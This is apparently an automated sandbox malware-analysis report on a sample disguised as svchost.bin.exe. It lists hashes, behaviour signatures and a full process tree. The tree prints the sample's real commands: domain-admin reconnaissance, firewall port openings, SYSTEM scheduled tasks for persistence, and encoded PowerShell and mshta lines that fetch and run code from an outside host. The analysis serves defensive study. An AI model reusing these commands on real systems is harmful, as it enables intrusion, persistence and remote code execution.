Overview
overview
10Static
static
3svchost.bin.exe
windows7_x64
10svchost.bin.exe
windows7_x64
10svchost.bin.exe
windows7_x64
10svchost.bin.exe
windows7_x64
10svchost.bin.exe
windows11_x64
10svchost.bin.exe
windows10_x64
9svchost.bin.exe
windows10_x64
svchost.bin.exe
windows10_x64
10svchost.bin.exe
windows10_x64
10svchost.bin.exe
windows10_x64
10Analysis
-
max time kernel
1757s -
max time network
1759s -
platform
windows7_x64 -
resource
win7-fr -
submitted
04-09-2021 07:35
Static task
static1
Behavioral task
behavioral1
Sample
svchost.bin.exe
Resource
win7-jp
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
svchost.bin.exe
Resource
win7-fr
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral3
Sample
svchost.bin.exe
Resource
win7-en
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral4
Sample
svchost.bin.exe
Resource
win7-de
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral5
Sample
svchost.bin.exe
Resource
win11
windows11_x64
0 signatures
0 seconds
Behavioral task
behavioral6
Sample
svchost.bin.exe
Resource
win10-en
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral7
Sample
svchost.bin.exe
Resource
win10-jp
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral8
Sample
svchost.bin.exe
Resource
win10-fr
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral9
Sample
svchost.bin.exe
Resource
win10-en
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral10
Sample
svchost.bin.exe
Resource
win10-de
windows10_x64
0 signatures
0 seconds
General
-
Target
svchost.bin.exe
-
Size
6.6MB
-
MD5
2787bb2d1ab223f8ac2692f3a8fd85fc
-
SHA1
dc34ee4e46ddea333cdc90e4aad7589cb8ee1ea0
-
SHA256
952e3e059251cd41e3c67006c5aa4b75fe3e6b0f18d96554b2d60d4ccfb78cb4
-
SHA512
d79bd7599ccb09fa72b939a506d04e28cb958e59c3987ab4d375e76337d5b1e33369d59397338aaeaf938c14ec9d93b20501d5224d151631c69c874d0657e9f3
Score
10/10
Malware Config
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 1 IoCs
flow pid Process 120092 2388 powershell.EXE -
Executes dropped EXE 6 IoCs
pid Process 2472 KnVAvdTx.exe 2404 KnVAvdTx.exe 2360 KnVAvdTx.exe 2100 KnVAvdTx.exe 2548 KnVAvdTx.exe 2136 KnVAvdTx.exe -
Modifies Windows Firewall 1 TTPs
-
Loads dropped DLL 64 IoCs
pid Process 1576 svchost.bin.exe 1576 svchost.bin.exe 1576 svchost.bin.exe 1576 svchost.bin.exe 1576 svchost.bin.exe 1576 svchost.bin.exe 1576 svchost.bin.exe 1576 svchost.bin.exe 1576 svchost.bin.exe 1576 svchost.bin.exe 1576 svchost.bin.exe 1576 svchost.bin.exe 1576 svchost.bin.exe 1576 svchost.bin.exe 1576 svchost.bin.exe 1576 svchost.bin.exe 1576 svchost.bin.exe 1576 svchost.bin.exe 1576 svchost.bin.exe 1576 svchost.bin.exe 2404 KnVAvdTx.exe 2404 KnVAvdTx.exe 2404 KnVAvdTx.exe 2404 KnVAvdTx.exe 2404 KnVAvdTx.exe 2404 KnVAvdTx.exe 2404 KnVAvdTx.exe 2404 KnVAvdTx.exe 2404 KnVAvdTx.exe 2404 KnVAvdTx.exe 2404 KnVAvdTx.exe 2404 KnVAvdTx.exe 2404 KnVAvdTx.exe 2404 KnVAvdTx.exe 2404 KnVAvdTx.exe 2404 KnVAvdTx.exe 2404 KnVAvdTx.exe 2404 KnVAvdTx.exe 2404 KnVAvdTx.exe 2404 KnVAvdTx.exe 2100 KnVAvdTx.exe 2100 KnVAvdTx.exe 2100 KnVAvdTx.exe 2100 KnVAvdTx.exe 2100 KnVAvdTx.exe 2100 KnVAvdTx.exe 2100 KnVAvdTx.exe 2100 KnVAvdTx.exe 2100 KnVAvdTx.exe 2100 KnVAvdTx.exe 2100 KnVAvdTx.exe 2100 KnVAvdTx.exe 2100 KnVAvdTx.exe 2100 KnVAvdTx.exe 2100 KnVAvdTx.exe 2100 KnVAvdTx.exe 2100 KnVAvdTx.exe 2100 KnVAvdTx.exe 2100 KnVAvdTx.exe 2100 KnVAvdTx.exe 2136 KnVAvdTx.exe 2136 KnVAvdTx.exe 2136 KnVAvdTx.exe 2136 KnVAvdTx.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE -
Drops file in Windows directory 2 IoCs
description ioc Process File created \??\c:\windows\KnVAvdTx.exe cmd.exe File opened for modification \??\c:\windows\KnVAvdTx.exe cmd.exe -
Detects Pyinstaller 3 IoCs
resource yara_rule behavioral2/files/0x0003000000012f46-134.dat pyinstaller behavioral2/files/0x0003000000012f46-136.dat pyinstaller behavioral2/files/0x0003000000012f46-138.dat pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1268 schtasks.exe 328 schtasks.exe 320 schtasks.exe -
Gathers network information 2 TTPs 3 IoCs
Uses commandline utility to view network configuration.
pid Process 1820 ipconfig.exe 528 ipconfig.exe 848 netstat.exe -
Modifies data under HKEY_USERS 35 IoCs
description ioc Process Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-1 = "IPsec Relying Party" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-2 = "Provides IPsec based enforcement for Network Access Protection" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-3 = "Microsoft Corporation" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-102 = "1.0" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-100 = "EAP Quarantine Enforcement Client" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-103 = "Microsoft Corporation" netsh.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft WScript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host WScript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings WScript.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{35786D3C-B075-49B9-88DD-029876E11C01} {ADD8BA80-002B-11D0-8F0F-00C04FD7D062} 0xFFFF = 010000000000000000bad25860a1d701 WScript.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-103 = "Microsoft Corporation" netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 80346e7661a1d701 powershell.EXE Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ cmd.exe Key created \REGISTRY\USER\.DEFAULT\Software WScript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached WScript.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-103 = "1.0" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-102 = "1.0" netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings WScript.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-4 = "1.0" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-101 = "Provides Network Access Protection enforcement for EAP authenticated network connections, such as those used with 802.1X and VPN technologies." netsh.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" cmd.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{B155BDF8-02F0-451E-9A26-AE317CFD7779} {ADD8BA80-002B-11D0-8F0F-00C04FD7D062} 0xFFFF = 0100000000000000803fdc5860a1d701 WScript.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-100 = "DHCP Quarantine Enforcement Client" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-101 = "Provides DHCP based enforcement for NAP" netsh.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" WScript.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-102 = "Microsoft Corporation" netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WScript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" WScript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" cmd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing WScript.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-100 = "RD Gateway Quarantine Enforcement Client" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-101 = "Provides RD Gateway enforcement for NAP" netsh.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 7 IoCs
pid Process 1620 powershell.exe 1620 powershell.exe 1620 powershell.exe 1620 powershell.exe 1620 powershell.exe 1620 powershell.exe 2388 powershell.EXE -
Suspicious use of AdjustPrivilegeToken 43 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 972 WMIC.exe Token: SeSecurityPrivilege 972 WMIC.exe Token: SeTakeOwnershipPrivilege 972 WMIC.exe Token: SeLoadDriverPrivilege 972 WMIC.exe Token: SeSystemProfilePrivilege 972 WMIC.exe Token: SeSystemtimePrivilege 972 WMIC.exe Token: SeProfSingleProcessPrivilege 972 WMIC.exe Token: SeIncBasePriorityPrivilege 972 WMIC.exe Token: SeCreatePagefilePrivilege 972 WMIC.exe Token: SeBackupPrivilege 972 WMIC.exe Token: SeRestorePrivilege 972 WMIC.exe Token: SeShutdownPrivilege 972 WMIC.exe Token: SeDebugPrivilege 972 WMIC.exe Token: SeSystemEnvironmentPrivilege 972 WMIC.exe Token: SeRemoteShutdownPrivilege 972 WMIC.exe Token: SeUndockPrivilege 972 WMIC.exe Token: SeManageVolumePrivilege 972 WMIC.exe Token: 33 972 WMIC.exe Token: 34 972 WMIC.exe Token: 35 972 WMIC.exe Token: SeIncreaseQuotaPrivilege 972 WMIC.exe Token: SeSecurityPrivilege 972 WMIC.exe Token: SeTakeOwnershipPrivilege 972 WMIC.exe Token: SeLoadDriverPrivilege 972 WMIC.exe Token: SeSystemProfilePrivilege 972 WMIC.exe Token: SeSystemtimePrivilege 972 WMIC.exe Token: SeProfSingleProcessPrivilege 972 WMIC.exe Token: SeIncBasePriorityPrivilege 972 WMIC.exe Token: SeCreatePagefilePrivilege 972 WMIC.exe Token: SeBackupPrivilege 972 WMIC.exe Token: SeRestorePrivilege 972 WMIC.exe Token: SeShutdownPrivilege 972 WMIC.exe Token: SeDebugPrivilege 972 WMIC.exe Token: SeSystemEnvironmentPrivilege 972 WMIC.exe Token: SeRemoteShutdownPrivilege 972 WMIC.exe Token: SeUndockPrivilege 972 WMIC.exe Token: SeManageVolumePrivilege 972 WMIC.exe Token: 33 972 WMIC.exe Token: 34 972 WMIC.exe Token: 35 972 WMIC.exe Token: SeDebugPrivilege 1620 powershell.exe Token: SeDebugPrivilege 848 netstat.exe Token: SeDebugPrivilege 2388 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2016 wrote to memory of 1576 2016 svchost.bin.exe 29 PID 2016 wrote to memory of 1576 2016 svchost.bin.exe 29 PID 2016 wrote to memory of 1576 2016 svchost.bin.exe 29 PID 2016 wrote to memory of 1576 2016 svchost.bin.exe 29 PID 1576 wrote to memory of 1656 1576 svchost.bin.exe 32 PID 1576 wrote to memory of 1656 1576 svchost.bin.exe 32 PID 1576 wrote to memory of 1656 1576 svchost.bin.exe 32 PID 1576 wrote to memory of 1656 1576 svchost.bin.exe 32 PID 1656 wrote to memory of 972 1656 cmd.exe 33 PID 1656 wrote to memory of 972 1656 cmd.exe 33 PID 1656 wrote to memory of 972 1656 cmd.exe 33 PID 1656 wrote to memory of 972 1656 cmd.exe 33 PID 1576 wrote to memory of 1688 1576 svchost.bin.exe 34 PID 1576 wrote to memory of 1688 1576 svchost.bin.exe 34 PID 1576 wrote to memory of 1688 1576 svchost.bin.exe 34 PID 1576 wrote to memory of 1688 1576 svchost.bin.exe 34 PID 1688 wrote to memory of 1308 1688 cmd.exe 35 PID 1688 wrote to memory of 1308 1688 cmd.exe 35 PID 1688 wrote to memory of 1308 1688 cmd.exe 35 PID 1688 wrote to memory of 1308 1688 cmd.exe 35 PID 1308 wrote to memory of 1560 1308 net.exe 36 PID 1308 wrote to memory of 1560 1308 net.exe 36 PID 1308 wrote to memory of 1560 1308 net.exe 36 PID 1308 wrote to memory of 1560 1308 net.exe 36 PID 1576 wrote to memory of 1380 1576 svchost.bin.exe 37 PID 1576 wrote to memory of 1380 1576 svchost.bin.exe 37 PID 1576 wrote to memory of 1380 1576 svchost.bin.exe 37 PID 1576 wrote to memory of 1380 1576 svchost.bin.exe 37 PID 1380 wrote to memory of 1624 1380 cmd.exe 38 PID 1380 wrote to memory of 1624 1380 cmd.exe 38 PID 1380 wrote to memory of 1624 1380 cmd.exe 38 PID 1380 wrote to memory of 1624 1380 cmd.exe 38 PID 1624 wrote to memory of 1828 1624 net.exe 39 PID 1624 wrote to memory of 1828 1624 net.exe 39 PID 1624 wrote to memory of 1828 1624 net.exe 39 PID 1624 wrote to memory of 1828 1624 net.exe 39 PID 1576 wrote to memory of 1620 1576 svchost.bin.exe 40 PID 1576 wrote to memory of 1620 1576 svchost.bin.exe 40 PID 1576 wrote to memory of 1620 1576 svchost.bin.exe 40 PID 1576 wrote to memory of 1620 1576 svchost.bin.exe 40 PID 1576 wrote to memory of 328 1576 svchost.bin.exe 41 PID 1576 wrote to memory of 328 1576 svchost.bin.exe 41 PID 1576 wrote to memory of 328 1576 svchost.bin.exe 41 PID 1576 wrote to memory of 328 1576 svchost.bin.exe 41 PID 328 wrote to memory of 1820 328 cmd.exe 42 PID 328 wrote to memory of 1820 328 cmd.exe 42 PID 328 wrote to memory of 1820 328 cmd.exe 42 PID 328 wrote to memory of 1820 328 cmd.exe 42 PID 1576 wrote to memory of 528 1576 svchost.bin.exe 43 PID 1576 wrote to memory of 528 1576 svchost.bin.exe 43 PID 1576 wrote to memory of 528 1576 svchost.bin.exe 43 PID 1576 wrote to memory of 528 1576 svchost.bin.exe 43 PID 1576 wrote to memory of 848 1576 svchost.bin.exe 44 PID 1576 wrote to memory of 848 1576 svchost.bin.exe 44 PID 1576 wrote to memory of 848 1576 svchost.bin.exe 44 PID 1576 wrote to memory of 848 1576 svchost.bin.exe 44 PID 2292 wrote to memory of 2356 2292 ZHUcKkVq.exe 46 PID 2292 wrote to memory of 2356 2292 ZHUcKkVq.exe 46 PID 2292 wrote to memory of 2356 2292 ZHUcKkVq.exe 46 PID 2292 wrote to memory of 2356 2292 ZHUcKkVq.exe 46 PID 2356 wrote to memory of 2308 2356 cmd.exe 48 PID 2356 wrote to memory of 2308 2356 cmd.exe 48 PID 2356 wrote to memory of 2308 2356 cmd.exe 48 PID 2356 wrote to memory of 2308 2356 cmd.exe 48
Processes
-
C:\Users\Admin\AppData\Local\Temp\svchost.bin.exe"C:\Users\Admin\AppData\Local\Temp\svchost.bin.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2016 -
C:\Users\Admin\AppData\Local\Temp\svchost.bin.exe"C:\Users\Admin\AppData\Local\Temp\svchost.bin.exe"2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1576 -
C:\Windows\SysWOW64\cmd.execmd /c wmic ntdomain get domainname3⤵
- Suspicious use of WriteProcessMemory
PID:1656 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic ntdomain get domainname4⤵
- Suspicious use of AdjustPrivilegeToken
PID:972
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net localgroup administrators3⤵
- Suspicious use of WriteProcessMemory
PID:1688 -
C:\Windows\SysWOW64\net.exenet localgroup administrators4⤵
- Suspicious use of WriteProcessMemory
PID:1308 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup administrators5⤵PID:1560
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net group "domain admins" /domain3⤵
- Suspicious use of WriteProcessMemory
PID:1380 -
C:\Windows\SysWOW64\net.exenet group "domain admins" /domain4⤵
- Suspicious use of WriteProcessMemory
PID:1624 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 group "domain admins" /domain5⤵PID:1828
-
-
-
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysNative\WindowsPowerShell\v1.0\powershell.exe -exec bypass "import-module C:\Users\Admin\AppData\Local\Temp\m2.ps1"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1620
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ipconfig /all3⤵
- Suspicious use of WriteProcessMemory
PID:328 -
C:\Windows\SysWOW64\ipconfig.exeipconfig /all4⤵
- Gathers network information
PID:1820
-
-
-
C:\Windows\SysWOW64\ipconfig.exeipconfig /all3⤵
- Gathers network information
PID:528
-
-
C:\Windows\SysWOW64\netstat.exenetstat -na3⤵
- Gathers network information
- Suspicious use of AdjustPrivilegeToken
PID:848
-
-
-
C:\Windows\ZHUcKkVq.exeC:\Windows\ZHUcKkVq.exe1⤵
- Suspicious use of WriteProcessMemory
PID:2292 -
C:\Windows\SysWOW64\cmd.execmd /c call "c:\windows\temp\tmp.vbs"2⤵
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:2356 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\windows\temp\tmp.vbs"3⤵
- Modifies data under HKEY_USERS
PID:2308 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c echo QSjbOyJf >> c:\windows\temp\svchost.exe&echo "*" >c:\windows\temp\ipc.txt&netsh firewall add portopening tcp 65533 DNSd&netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53© /y c:\windows\temp\svchost.exe c:\windows\KnVAvdTx.exe&move /y c:\windows\temp\dig.exe c:\windows\TlWXsSY.exe&if exist C:/windows/system32/WindowsPowerShell/ (schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn KnVAvdTx /tr "C:\Windows\KnVAvdTx.exe" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\enkjrNu" /tr "c:\windows\TlWXsSY.exe" /F) else (start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autocheck /f&schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autocheck /tr "cmd.exe /c mshta http://w.beahh.com/page.html?pKJUCCLUP"&schtasks /run /TN Autocheck&start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autostart /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN Autostart /tr "c:\windows\TlWXsSY.exe"&schtasks /run /TN Autostart&start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN escan /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN escan /tr "c:\windows\KnVAvdTx.exe"&schtasks /run /TN escan)4⤵
- Drops file in Windows directory
PID:2456 -
C:\Windows\SysWOW64\netsh.exenetsh firewall add portopening tcp 65533 DNSd5⤵
- Modifies data under HKEY_USERS
PID:2672
-
-
C:\Windows\SysWOW64\netsh.exenetsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=535⤵
- Modifies data under HKEY_USERS
PID:1720
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F5⤵
- Creates scheduled task(s)
PID:320
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn KnVAvdTx /tr "C:\Windows\KnVAvdTx.exe" /F5⤵
- Creates scheduled task(s)
PID:1268
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\enkjrNu" /tr "c:\windows\TlWXsSY.exe" /F5⤵
- Creates scheduled task(s)
PID:328
-
-
-
-
-
C:\Windows\pnFJljJU.exeC:\Windows\pnFJljJU.exe1⤵PID:1112
-
C:\Windows\system32\taskeng.exetaskeng.exe {57BD7973-8D71-425C-B4A4-3021A67CAC3A} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:2560
-
C:\Windows\KnVAvdTx.exeC:\Windows\KnVAvdTx.exe2⤵
- Executes dropped EXE
PID:2472 -
C:\Windows\KnVAvdTx.exeC:\Windows\KnVAvdTx.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2404
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=2⤵
- Blocklisted process makes network request
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2388
-
-
C:\Windows\KnVAvdTx.exeC:\Windows\KnVAvdTx.exe2⤵
- Executes dropped EXE
PID:2360 -
C:\Windows\KnVAvdTx.exeC:\Windows\KnVAvdTx.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2100
-
-
-
C:\Windows\KnVAvdTx.exeC:\Windows\KnVAvdTx.exe2⤵
- Executes dropped EXE
PID:2548 -
C:\Windows\KnVAvdTx.exeC:\Windows\KnVAvdTx.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2136
-
-